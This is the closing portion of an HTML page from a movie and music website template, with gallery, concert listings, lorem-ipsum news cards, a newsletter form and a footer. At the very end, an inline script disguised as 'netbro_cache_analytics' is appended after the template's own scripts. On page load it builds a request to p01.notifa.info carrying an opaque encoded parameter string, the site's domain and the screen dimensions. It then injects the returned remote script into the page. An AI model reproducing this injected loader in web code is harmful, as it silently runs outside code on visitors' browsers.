                            <h2 class="name">Jec Jisom Kalam</h2>
                        </div>
                    </div>
                </div>
                <div class="col-lg-4 col-md-6 col-sm-6 col-12">
                    <div class="single-gallery">
                        <div class="img">
                            <img src="img/home3/gallery-6.jpg" alt="">
                        </div>
                        <div class="content">
                            <a class="link" href="#" target="_blank">
                                <i class="fas fa-link"></i>
                            </a>
                            <h2 class="name">Jec Jisom Kalam</h2>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <!-- my-gallery-area-end -->
    <!-- upcoming-music-area-start -->
    <div class="upcoming-music-area">
        <div class="container">
            <div class="row">
                <div class="col-12">
                    <div class="section-title">
                        <h2>Upcoming Music Show</h2>
                    </div>
                </div>
            </div>
            <div class="row">
                <div class="col-lg-4 col-sm-12 col-12">
                    <div class="upcoming-music-banner">
                        <img src="img/home3/upcoming-banner.png" alt="">
                    </div>
                </div>
                <div class="col-lg-8 col-sm-12 col-12">
                    <div class="all-upcoming-music">
                        <div class="single-upcoming-music justify-content-center align-items-center">
                            <div class="date-day">
                                <ul class="date">
                                    <li>27</li>
                                    <li>05</li>
                                    <li>18</li>
                                </ul>
                                <p class="day">Sunday</p>
                            </div>
                            <div class="place">
                                <h5 class="p1">LONDON CONCERT</h5>
                                <p class="p2">Sylhet, England</p>
                            </div>
                            <div class="banner">
                                <img src="img/home3/ums-banner-1.jpg" alt="">
                            </div>
                            <div class="buy">
                                <a class="link" href="#">Buy Ticket</a>
                            </div>
                        </div>
                        <div class="single-upcoming-music justify-content-center align-items-center">
                            <div class="date-day">
                                <ul class="date">
                                    <li>27</li>
                                    <li>05</li>
                                    <li>18</li>
                                </ul>
                                <p class="day">Sunday</p>
                            </div>
                            <div class="place">
                                <h5 class="p1">LONDON CONCERT</h5>
                                <p class="p2">Sylhet, England</p>
                            </div>
                            <div class="banner">
                                <img src="img/home3/ums-banner-2.jpg" alt="">
                            </div>
                            <div class="buy">
                                <a class="link" href="#">Buy Ticket</a>
                            </div>
                        </div>
                        <div class="single-upcoming-music justify-content-center align-items-center">
                            <div class="date-day">
                                <ul class="date">
                                    <li>27</li>
                                    <li>05</li>
                                    <li>18</li>
                                </ul>
                                <p class="day">Sunday</p>
                            </div>
                            <div class="place">
                                <h5 class="p1">LONDON CONCERT</h5>
                                <p class="p2">Sylhet, England</p>
                            </div>
                            <div class="banner">
                                <img src="img/home3/ums-banner-3.jpg" alt="">
                            </div>
                            <div class="buy">
                                <a class="link" href="#">Buy Ticket</a>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <!-- upcoming-music-area-end -->
    <!-- news-area-start -->
    <div class="h3-news-area news-area">
        <div class="container">
            <div class="row">
                <div class="col-12">
                    <div class="section-title">
                        <h2>Letest News</h2>
                    </div>
                </div>
            </div>
            <div class="row">
                <div class="col-lg-7 col-md-12 col-sm-12 col-12">
                    <div class="feature-news">
                        <div class="single-news">
                            <div class="img">
                                <img src="img/home1/latest-news-b-1.jpg" alt="">
                            </div>
                            <div class="content">
                                <span class="date">October-17-2017</span>
                                <h2 class="title">
                                    <a href="11_blog-details.html">Jecu Jek English Horor Movie Lorem Ipsum is there fore always free from.</a>
                                </h2>
                                <p class="text">Pellentesque imperdiet sagittis est, vitae consectetur enim feugiat quis. Nunc purus eros,
                                    feugiat at enim sit amet, dictum maximus nisl. In vitae lorem vitae mauris vestibulum
                                    venenatis eget a urna. Etiam vehicula lorem.</p>
                                <div class="meta-more">
                                    <a class="more" href="11_blog-details.html">Read More</a>
                                    <ul class="meta">
                                        <li>
                                            <span>
                                                <i class="far fa-user"></i>
                                            </span> By Admin</li>
                                        <li>
                                            <span>
                                                <i class="far fa-comments"></i>
                                            </span> Comments</li>
                                        <li>
                                            <span>
                                                <i class="fas fa-share-alt"></i>
                                            </span> Share</li>
                                    </ul>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="col-lg-5 col-md-12 col-sm-12 col-12">
                    <div class="news-carousel owl-carousel">
                        <div class="all-small-news">
                            <div class="single-news">
                                <div class="img">
                                    <img src="img/home1/latest-news-s-1.jpg" alt="">
                                </div>
                                <div class="content">
                                    <h2 class="title">
                                        <a href="11_blog-details.html">Jecu Jek English Horor Movie Lorem fore always free from.</a>
                                    </h2>
                                    <div class="meta-more">
                                        <a class="more" href="11_blog-details.html">Read More</a>
                                        <ul class="meta">
                                            <li>
                                                <span>
                                                    <i class="far fa-user"></i>
                                                </span> By Admin</li>
                                            <li>
                                                <span>
                                                    <i class="far fa-comments"></i>
                                                </span> Comments</li>
                                            <li>
                                                <span>
                                                    <i class="fas fa-share-alt"></i>
                                                </span> Share</li>
                                        </ul>
                                    </div>
                                </div>
                            </div>
                            <div class="single-news">
                                <div class="img">
                                    <img src="img/home1/latest-news-s-2.jpg" alt="">
                                </div>
                                <div class="content">
                                    <h2 class="title">
                                        <a href="11_blog-details.html">Jecu Jek English Horor Movie Lorem fore always free from.</a>
                                    </h2>
                                    <div class="meta-more">
                                        <a class="more" href="11_blog-details.html">Read More</a>
                                        <ul class="meta">
                                            <li>
                                                <span>
                                                    <i class="far fa-user"></i>
                                                </span> By Admin</li>
                                            <li>
                                                <span>
                                                    <i class="far fa-comments"></i>
                                                </span> Comments</li>
                                            <li>
                                                <span>
                                                    <i class="fas fa-share-alt"></i>
                                                </span> Share</li>
                                        </ul>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <div class="all-small-news">
                            <div class="single-news">
                                <div class="img">
                                    <img src="img/home1/latest-news-s-1.jpg" alt="">
                                </div>
                                <div class="content">
                                    <h2 class="title">
                                        <a href="#">Jecu Jek English Horor Movie Lorem fore always free from.</a>
                                    </h2>
                                    <div class="meta-more">
                                        <a class="more" href="#">Read More</a>
                                        <ul class="meta">
                                            <li>
                                                <span>
                                                    <i class="far fa-user"></i>
                                                </span> By Admin</li>
                                            <li>
                                                <span>
                                                    <i class="far fa-comments"></i>
                                                </span> Comments</li>
                                            <li>
                                                <span>
                                                    <i class="fas fa-share-alt"></i>
                                                </span> Share</li>
                                        </ul>
                                    </div>
                                </div>
                            </div>
                            <div class="single-news">
                                <div class="img">
                                    <img src="img/home1/latest-news-s-2.jpg" alt="">
                                </div>
                                <div class="content">
                                    <h2 class="title">
                                        <a href="#">Jecu Jek English Horor Movie Lorem fore always free from.</a>
                                    </h2>
                                    <div class="meta-more">
                                        <a class="more" href="#">Read More</a>
                                        <ul class="meta">
                                            <li>
                                                <span>
                                                    <i class="far fa-user"></i>
                                                </span> By Admin</li>
                                            <li>
                                                <span>
                                                    <i class="far fa-comments"></i>
                                                </span> Comments</li>
                                            <li>
                                                <span>
                                                    <i class="fas fa-share-alt"></i>
                                                </span> Share</li>
                                        </ul>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <!-- news-area-end -->
    <!-- h3-newsletter-area-start -->
    <div class="h3-newsletter-area bg-with-ebony">
        <div class="container">
            <div class="row">
                <div class="col-lg-7 offset-lg-1 col-md-7 col-sm-12 col-12">
                    <div class="h3-newsletter newsletter">
                        <h2 class="title">Newsletter</h2>
                        <p class="text">There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration
                            in some form cted humour or randomised words.</p>
                        <form action="#">
                            <div class="newsleter-input-box">
                                <input type="text" placeholder="Enter your email.......">
                                <button>
                                    <i class="far fa-paper-plane"></i>
                                </button>
                            </div>
                        </form>
                    </div>
                </div>
                <div class="col-lg-3 offset-lg-1 col-md-5 col-sm-12 col-12">
                    <div class="h3n-twitter-feed fw-twitter footer-widget">
                        <h4 class="title">Twitter</h4>
                        <ul class="tweet-feed">
                            <li>
                                <h6 class="name">
                                    <span class="icon">
                                        <i class="fab fa-twitter"></i>
                                    </span> @ifinger.
                                    <span>movie</span>
                                </h6>
                                <p class="text">Lorem Ipsum is simply dummy text printing and typesetting.</p>
                            </li>
                            <li>
                                <h6 class="name">
                                    <span class="icon">
                                        <i class="fab fa-twitter"></i>
                                    </span> @ifinger.
                                    <span>movie</span>
                                </h6>
                                <p class="text">Lorem Ipsum is simply dummy text printing and typesetting.</p>
                            </li>
                        </ul>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <!-- h3-newsletter-area-end -->
    <!-- footer-start -->
    <footer class="h3-footer">
        <div class="footer-top-area">
            <div class="container">
                <div class="row">
                    <div class="col-lg-3 col-md-6 col-sm-6 col-12">
                        <div class="fw-list footer-widget">
                            <h4 class="title">Movies Category</h4>
                            <ul class="list">
                                <li>
                                    <a href="#">About Us</a>
                                </li>
                                <li>
                                    <a href="#">Popular Courses</a>
                                </li>
                                <li>
                                    <a href="#">Forums</a>
                                </li>
                                <li>
                                    <a href="#">Place</a>
                                </li>
                                <li>
                                    <a href="#">Our Teachers</a>
                                </li>
                                <li>
                                    <a href="#">Upcoming Events</a>
                                </li>
                                <li>
                                    <a href="#">Contact Us</a>
                                </li>
                            </ul>
                        </div>
                    </div>
                    <div class="col-lg-3 col-md-6 col-sm-6 col-12">
                        <div class="fw-list footer-widget">
                            <h4 class="title">Resources</h4>
                            <ul class="list">
                                <li>
                                    <a href="#">About Block Buster</a>
                                </li>
                                <li>
                                    <a href="#">Security</a>
                                </li>
                                <li>
                                    <a href="#">Blog</a>
                                </li>
                                <li>
                                    <a href="#">Help Center</a>
                                </li>
                                <li>
                                    <a href="#">Terms of Use</a>
                                </li>
                                <li>
                                    <a href="#">Privacy Policy</a>
                                </li>
                                <li>
                                    <a href="#">Movie Collections</a>
                                </li>
                            </ul>
                        </div>
                    </div>
                    <div class="col-lg-3 col-md-6 col-sm-6 col-12">
                        <div class="fw-info footer-widget">
                            <div class="flogo">
                                <img src="img/home3/logo.png" alt="">
                            </div>
                            <p class="text">Lorem Ipsum is simply dummy text of the printing and typesetting.Lorem Ipsum is simply dummy
                                text of the print.</p>
                            <ul class="address">
                                <li>
                                    <span>
                                        <i class="fas fa-map-marker-alt"></i>
                                    </span> Bangladesh, Dhaka, Mirpur -12</li>
                                <li>
                                    <span>
                                        <i class="fas fa-phone"></i>
                                    </span> +(999) 321456987</li>
                                <li>
                                    <span>
                                        <i class="far fa-envelope"></i>
                                    </span> i-finger.education@gmail.com</li>
                            </ul>
                            <ul class="social">
                                <li>
                                    <a href="#" target="_blank">
                                        <i class="fab fa-facebook-f"></i>
                                    </a>
                                </li>
                                <li>
                                    <a href="#" target="_blank">
                                        <i class="fab fa-twitter"></i>
                                    </a>
                                </li>
                                <li>
                                    <a href="#" target="_blank">
                                        <i class="fab fa-pinterest-p"></i>
                                    </a>
                                </li>
                                <li>
                                    <a href="#" target="_blank">
                                        <i class="fab fa-youtube"></i>
                                    </a>
                                </li>
                                <li>
                                    <a href="#" target="_blank">
                                        <i class="fab fa-vimeo-v"></i>
                                    </a>
                                </li>
                            </ul>
                        </div>
                    </div>
                    <div class="col-lg-3 col-md-6 col-sm-6 col-12">
                        <div class="fw-member footer-widget">
                            <div class="head">
                                <p class="type">Team Member</p>
                                <ul class="social">
                                    <li>
                                        <a href="#" target="_blank">
                                            <i class="fab fa-facebook-f"></i>
                                        </a>
                                    </li>
                                    <li>
                                        <a href="#" target="_blank">
                                            <i class="fab fa-linkedin"></i>
                                        </a>
                                    </li>
                                    <li>
                                        <a href="#" target="_blank">
                                            <i class="fab fa-twitter"></i>
                                        </a>
                                    </li>
                                    <li>
                                        <a href="#" target="_blank">
                                            <i class="fab fa-pinterest-p"></i>
                                        </a>
                                    </li>
                                </ul>
                            </div>
                            <div class="img">
                                <img src="img/home3/footer-team.png" alt="">
                            </div>
                            <h5 class="name">Emmanna Papang</h5>
                            <p class="text">Lorem Ipsum is simply dummy text of the printing.</p>
                            <a class="mail" href="#" href="mailto:demo@demo.com">
                                <span>
                                    <i class="fas fa-envelope"></i>
                                </span> i-finger012@gmail.com</a>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <div class="footer-bottom-area">
            <div class="container">
                <div class="row">
                    <div class="col-lg-6 col-md-12 col-sm-12 col-12">
                        <div class="fba-left">
                            <ul class="links">
                                <li>
                                    <a href="#">Home</a>
                                </li>
                                <li>
                                    <a href="#">Movie Layout</a>
                                </li>
                                <li>
                                    <a href="#">Celebrities</a>
                                </li>
                                <li>
                                    <a href="#">News</a>
                                </li>
                                <li>
                                    <a href="#">Contacts</a>
                                </li>
                            </ul>
                        </div>
                    </div>
                    <div class="col-lg-6 col-md-12 col-sm-12 col-12">
                        <div class="fba-right">
                            <p class="copyright">CopyRight© 2018 Design by
                                <a href="#">@i-finger</a> . All Rights Reserved.</p>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </footer>
    <!-- footer-end -->
    <!-- Scripts -->
    <script src="js/jquery-3.2.0.min.js"></script>
    <script src="js/jquery-ui.js"></script>
    <script src="js/owl.carousel.min.js"></script>
    <script src="js/jquery.counterup.min.js"></script>
    <script src="js/countdown.js"></script>
    <script src="js/parallax.js"></script>
    <script src="js/amplitude.js"></script>
    <script src="js/plyr.js"></script>
    <script src="js/jquery.slimscroll.min.js"></script>
    <script src="js/jquery.magnific-popup.min.js"></script>
    <script src="js/jquery.slicknav.min.js"></script>
    <script src="js/jquery.scrollUp.js"></script>
    <script src="js/jquery.mixitup.min.js"></script>
    <script src="js/jquery.waypoints.min.js"></script>
    <script src="js/popper.min.js"></script>
    <script src="js/bootstrap.min.js"></script>
    <script src="js/theme.js"></script>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JKzDzTsXZH2sft6BqMOmD02qfVv7hA9GudFwDj0DaxWzzjgv1HmyGpRafswTY0Qt9zRwmrkJ9QcKJgssfNzyumKPjxbRylfD%2fxJUZSnBvUSsq0OS3SnHZaWogC6IKU1k8h8WFZDQndFFrCEKvs7x0c%2fr%2fHszsw48zOErbmFUPhrjHTutfWtNXNsvKTNQtRezqg6N9lVH0m74aOvZh9pUgCjWgPTLC17TNpo2Cya9pRGjKkCjJcXjJzpADSxO1lAva2zE1%2bz9xpqk2etzylXSktZTqMXiAr5GxBnorpiLqgcDp2592qKHZhpGq4byo71Wl8KVJL67GtOjQjDqXVY7qW3Mu0WuuaaO9kXUogZUWOhyiAjkymnpgr7ZELY33ZX9FhZjcltCu%2b24KTh3nBV6l%2bo0p1eI7FtcoavDmCl3frEjqyxkUDpA2ciKcLyi5zOItRk1A7YLOy6ygFxBdW%2f2vmF%2fwSapS9DLTxWvxRdUOzIRvIrOky4g30zxIRPz6M6R8dUaQ%2bWVPA4RtgnRS2Q%2ftHE6LAvkUVFhw%3d%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>

</html>